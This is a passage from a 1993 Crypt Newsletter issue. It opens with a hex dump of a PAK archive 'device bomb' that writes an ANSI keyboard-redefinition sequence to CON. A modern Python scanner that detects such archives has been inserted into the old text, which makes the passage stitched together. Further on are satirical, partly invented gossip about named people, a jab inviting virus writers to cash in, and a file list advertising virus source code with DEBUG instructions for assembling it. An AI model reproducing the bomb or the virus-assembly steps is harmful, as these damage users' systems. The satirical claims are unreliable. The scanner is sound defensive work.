Ah gee, Mr. Wizard... It changed!!!
-
2EC7:0100 1A 02 43 4F 4E 00 46 72-11 00 00 00 14 15 13 11 ..CON.Fr........
2EC7:0110 00 00 00 EE 1A 59 7C 39-22 11 00 00 00 1B 5B 33 .....Y|9".....[3
2EC7:0120 32 3B 36 38 3B 37 33 3B-38 32 3B 31 33 70 1A 00 2;68;73;82;13p..
2EC7:0130 FE 02 01 00 00 00 00 00-FE 00 1E B8 B9 1E 50 FF ..............P.
2EC7:0140 36 98 1C E8 DD BC E8 8E-BD 98 89 C6 E8 AF FC 85 6...............
2EC7:0150 F6 74 0A C6 06 D9 22 01-B8 01 00 EB 02 31 C0 5E .t...."......1.^
2EC7:0160 C3 31 C0 50 31 C0 50 31-C0 50 E8 3A BE 3C 00 74 .1.P1.P1.P.:.<.t
2EC7:0170 AD E8 82 BB EB A3 56 A1-CE 1C 3B 06 98 1C 7E 04 ......V...;...~.
-
Well, that's about it! Easy as falling off a log, eh?...
*REMEMBER* to PAK up the executable you wish to have
executed or all this information will have been for naught!
Ah, you know I can't leave it like this . . .
Let me give you a quick run down on how to prevent this
from happening to you . . .
Simply use the HEX codes that are representative of;
;13p
and insert them into F-PROT's user defined area. Then scan
your .PAKs, .TXTs, and anything else that can be typed . . .
Till next time,
-----ARiSToTLE
[In related news, the PAK-bomb described above has been
blamed for a wave of BBS crashes in Oklahoma, according to Lee
Jackson's latest Hack Report.
Since the bomb is stored within the archive under the filename
CON - it is a "device" bomb, rather than a standard ANSI
bomb. "Turning off ANSI comments in PKZIP or other unpackers won't
stop it . . . unpacking the file causes the device CON to
be opened, and the bomb is written straight to it as a result,"
says The Hack Report, which is as good an explanation as
any.]
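Aristotle's closing advice (a signature for the ";13p" tail in F-PROT's user-defined area) and the Hack Report's note that the bomb travels as an archive member named CON both point at things a sysop's upload checker can look for before anything is extracted. The following is an added example written for this newsletter segment; it is not Aristotle's code, not part of the TJA generator or of PAK, and not from F-PROT. It walks the ARC/PAK member headers in the layout visible in the DEBUG listing above (marker 1Ah, method byte, 13-byte name, compressed size, date, time, CRC, original size) and flags two things: a member whose name is a reserved DOS device, and, in stored members, any ANSI.SYS keyboard-redefinition sequence (ESC [ ... p), which is more general than matching only ";13p". Assumptions: the header layout just described, that only stored (method 2) members are scanned byte for byte because no decompressor is included, and that `build_pak` exists only to construct the sample archive for the demonstration, modelled on the listing's bytes.

```python
"""Upload-side scanner for ARC/PAK-style archives (added defensive example).

Flags (1) members named after a reserved DOS device such as CON, which an
unpacker would write straight to the device, and (2) stored members that
contain an ANSI.SYS keyboard-redefinition sequence  ESC [ key ; ... p.
Assumption: classic ARC/PAK member header layout; compressed members are
not inflated here, so only their names are checked.
"""
import re
import struct

ARC_MARK = 0x1A        # every member header and the end record start with 1Ah
METHOD_END = 0         # method byte 0 marks the end-of-archive record
METHOD_STORED = 2      # uncompressed member; its bytes can be scanned directly

# ESC [ p1 ; p2 ; ... p  -- parameters are decimal codes or "quoted strings"
ANSI_KEY_REDEF = re.compile(rb'\x1b\[(?:\d+|"[^"]*")(?:;(?:\d+|"[^"]*"))*p')

# Reserved MS-DOS device names; a member with one of these names is opened
# as the device, not created as a file, when the archive is unpacked.
DOS_DEVICES = {"CON", "PRN", "AUX", "NUL", "CLOCK$"}
DOS_DEVICES |= {"COM%d" % i for i in range(1, 5)}
DOS_DEVICES |= {"LPT%d" % i for i in range(1, 4)}


def parse_pak_entries(data):
    """Yield (name, method, member_bytes) for each member header in DATA."""
    pos = 0
    while pos + 2 <= len(data):
        if data[pos] != ARC_MARK:
            raise ValueError("bad ARC/PAK marker at offset 0x%X" % pos)
        method = data[pos + 1]
        if method == METHOD_END:
            return
        raw_name = data[pos + 2:pos + 15]                 # 13-byte name field
        name = raw_name.split(b"\x00", 1)[0].decode("ascii", "replace")
        (comp_size,) = struct.unpack_from("<I", data, pos + 15)
        header_len = 25 if method == 1 else 29           # method 1 has no original-size field
        start = pos + header_len
        member = data[start:start + comp_size]
        if len(member) != comp_size:
            raise ValueError("truncated member %r" % name)
        yield name, method, member
        pos = start + comp_size


def is_device_name(name):
    """True if NAME, with or without an extension, is a reserved DOS device."""
    base = name.upper().split(".", 1)[0].rstrip()
    return base in DOS_DEVICES


def decode_key_redef(seq):
    """Turn ESC[32;68;73;82;13p into ("32", "DIR\\r"): key and injected text."""
    body = seq[2:-1].decode("ascii")                     # drop ESC[ and trailing p
    params = re.findall(r'"[^"]*"|\d+', body)
    if params[0] == "0" and len(params) > 2:             # extended key: 0;scancode
        key, rest = "ext" + params[1], params[2:]
    else:
        key, rest = params[0], params[1:]
    text = "".join(p[1:-1] if p.startswith('"') else chr(int(p)) for p in rest)
    return key, text


def scan_archive(data):
    """Return a list of (member name, finding) tuples for a PAK/ARC byte string."""
    findings = []
    for name, method, member in parse_pak_entries(data):
        if is_device_name(name):
            findings.append((name, "member named after DOS device %s" % name.upper()))
        if method == METHOD_STORED:
            for m in ANSI_KEY_REDEF.finditer(member):
                key, text = decode_key_redef(m.group(0))
                findings.append((name, "ANSI key %s redefined to %r" % (key, text)))
    return findings


def build_pak(name, data, method=METHOD_STORED):
    """Assemble a one-member archive plus end record (constructed sample data).

    Date, time and CRC words are the ones shown in the article's listing.
    """
    name_field = name.encode("ascii").ljust(13, b"\x00")
    header = bytes([ARC_MARK, method]) + name_field
    header += struct.pack("<IHHHI", len(data), 0x1AEE, 0x7C59, 0x2239, len(data))
    return header + data + bytes([ARC_MARK, METHOD_END])


# Constructed sample modelled on the listing: member CON holding the sequence
# that redefines the space bar (32) to type "DIR" followed by Enter (13).
BOMB_PAK = build_pak("CON", b"\x1b[32;68;73;82;13p")
# Constructed benign sample: an ANSI logo that only sets a colour (ESC[32m).
LOGO_PAK = build_pak("LOGO.ANS", b"\x1b[32mCRYPT\x1b[0m\r\n")

if __name__ == "__main__":
    for label, pak in (("TEST.PAK", BOMB_PAK), ("LOGO.PAK", LOGO_PAK)):
        print(label, scan_archive(pak) or "clean")
```

Run against the constructed TEST.PAK it reports both the CON member name and the decoded redefinition (key 32 to "DIR" plus carriage return); the colour-only logo passes, since the regex only fires on the `p` terminator that ANSI.SYS uses for key redefinition, not on `m` colour codes. For real uploads the device-name check is the one that matters most, because it catches the bomb regardless of what the member contains.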
FICTUAL FACT/FACTUAL FICTION: THERE'S NO SECOND CHANCE WHEN
DEADLY KUNG FU IS USED FOR EVIL!
>>Urnst Kouch stupidly referred to NuKE virus-programmer Rock Steady
as French-Canadian in a recent issue of "Gray Areas" magazine.
The newsletter regrets this deplorable "ugly Americanism" and
is sorry for any mental anguish it may have caused. Rock Steady
is not, nor has he ever been, French Canadian.
>>The immortal words of the SF Bay Area punk band, "And you'll
have to admit, that I'll be rich as shit!" from its song,
"The Money Will Roll Right In" could be applied to John
McAfee these days.
From a recent business report:
"Risk of Viruses
Given the Company's high profile in the anti-virus software market,
the Company has been a target of computer "crackers" who have
created viruses to sabotage the Company's products. While to date
these viruses have been discovered quickly and their dissemination
limited, there can be no assurance that similar viruses will not
be created in the future, that they will not cause damage to
users' computer systems and that demand for the Company's software
products will not suffer as a result. In addition, since the
Company does not control diskette duplication by shareware
distributors or its independent agents, there is no assurance
that diskettes containing the Company's software will not be infected.
The current list price for a 1,000 computer VIRUSCAN site license
is $7,125
The current list price for a 1,000 computer CLEAN-UP site license
is $8,910
The current list price for a 1,000 computer VSHIELD site license
is $8,910
Revenues for the second quarter of 1993 were $4,340,000, a 28%
increase over revenues for the second quarter of the previous year.
Net income for the second quarter of 1993 was $1,961,000, a 26%
increase over pro forma net income for the second quarter of 1992."
Crypt Newsletter financial analyst Cando estimates the following:
"John is taking home a base salary of $250,000 and cashed out at
the public offering for . . . hold on to your pants . . . a
whopping $8,400,000 cash money! McAfee still owns 4,475,000 shares
of stock.
"Every new virus that is perceived as a threat to Fortune 100
companies will only put more cash into McAfee's pocket. Maybe it's
time for NuKE to cash in on some of this corporate fisc?"
>>Freshly weaned "cyberpunk" Billy Idol has been deemed a wuss
by the computer underground. His recent release, "Cyberpunk," has
earned praise from the computer underground along the lines of
"He makes lots of money producing meaningless noise. We have to
bash him. It's the great American past-time." This summer, Idol
has had better luck with hookers than hi-tech computing, being
unable to distance himself from Hollywood infame after being
linked to "madame-to-the stars-and-assorted-perverted-rich-
coke-snuffling-studio-execs" Heidi Fleiss. Fleiss has
been associated/seen with Idol, movie producers with a taste for
defecating upon dates and an "east coast" computer entrepreneur
who likes to use horsewhips. Call Leisure Suit Larry!
>>CARO member Vesselin Bontchev and Bulgarian virus programmer,
The Dark Avenger, have teamed up in an effort to sell the
movie rights to their first hi-tech screenplay, "The Swizzler."
"The Swizzler," now being flogged to various agents in Burbank,
CA, is a high-tech thriller set in the near future where a
mysterious computer virus called "The Swizzler" has decimated the
world's banking institutions after escaping from a laboratory
in Los Alamos, NM. With America on its knees, the Computer
Emergency Response Team rushes on an overnite jet to Bettguano,
Bulgaria, to recruit the Avenger (playing himself) in a last
ditch race against the clock to halt "The Swizzler" before the
computer scourge activates and sends the Doomsday launch codes
to the ICBM fields. Bontchev and The Dark Avenger also flew
to Cannes, sponsored by the Bulgarian bubbly wine company
Champipple, for a press-the-flesh campaign.
>>The Dutch virus research group, TridenT, is working on a
new electronic magazine, tentatively named "TridenTial".
This, in the face of new "anti-virus" legislation in the
low country which makes it possible to prosecute those
proven to be trading computer viruses without "educational"
permit. Look for TridenTial soon and stay tuned to this
channel.
*CAVEAT EMPTOR*
What is the Crypt Newsletter? The Crypt Newsletter is an electronic
document which delivers deft satire, savage criticism and media
analyses on topics of interest to the editor and the computing
public. The Crypt Newsletter also reviews anti-virus and
security software and republishes digested news of note to
users of such. The Crypt Newsletter ALSO supplies analysis and
complete source code to many computer viruses made expressly for
the newsletter. Source codes and DEBUG scripts of these viruses
can corrupt - quickly and irreversibly - the data on an
IBM-compatible microcomputer - particularly when handled
imperfectly. Ownership of The Crypt Newsletter can damage
your reputation, making you unpopular in heavily institutionalized
settings, rigid bureaucracy or environments where unsophisticated,
self-important computer user groups cohabit.
Files included in this issue:
CRPTLT.R17 - this electronic document
TEST.PAK - Aristotle's PAK "device" bomb demonstrator
TREKWAR.ASM - TREKWAR source code
YB-X.ASM - YB/Dick Manitoba virus source code and analysis
CLUST.ASM - TridenT Cluster virus, advanced stealth
example, and analysis
VECTOR.ASM - Kohntark's interrupt vector lister utility,
in source code
YB-X.SCR - scriptfile for YB
TREKWAR.SCR - scriptfile for TREKWAR
CLUST.SCR - scriptfile for CLUSTER
VECTOR.SCR - scriptfile for Kohntark's vector lister
To assemble programs in the newsletter directly from scriptfiles,
copy the MS-DOS program DEBUG.EXE to your work directory and
type:
DEBUG <*.scr
where *.scr is the scriptfile of interest included in this issue.
-------------------------------------------------------------------
So you like the newsletter? Maybe you want more? Maybe you
want to meet the avuncular Urnst Kouch in person! You can
access him at ukouch@delphi.com, as well as at Crypt InfoSystems:
818-683-0854/14.4.
Send all contributions to
Other fine BBS's which stock the newsletter are:
MICRO INFORMATION SYSTEMS SERVICES 1-805-251-0564
THE HELL PIT 1-708-459-7267
DRAGON'S DEN 1-215-882-1415
RIPCO ][ 1-312-528-5020
AIS 1-304-480-6083
CYBERNETIC VIOLENCE 1-514-425-4540
THE BLACK AXIS/VA. INSTITUTE OF VIRUS RESEARCH 1-804-599-4152
UNPHAMILIAR TERRITORY 1-602-PRI-VATE
THE OTHER SIDE 1-512-618-0154
REALM OF THE SHADOW 1-210-783-6526
THE BIT BANK 1-215-966-3812
DIGITAL DECAY 1-714-871-2057
*********************************************************************
Comment within the Crypt Newsletter is copyrighted by Urnst Kouch,
1993. If you choose to reprint sections of it for your own use,
you might consider contacting him as a matter of courtesy.
*********************************************************************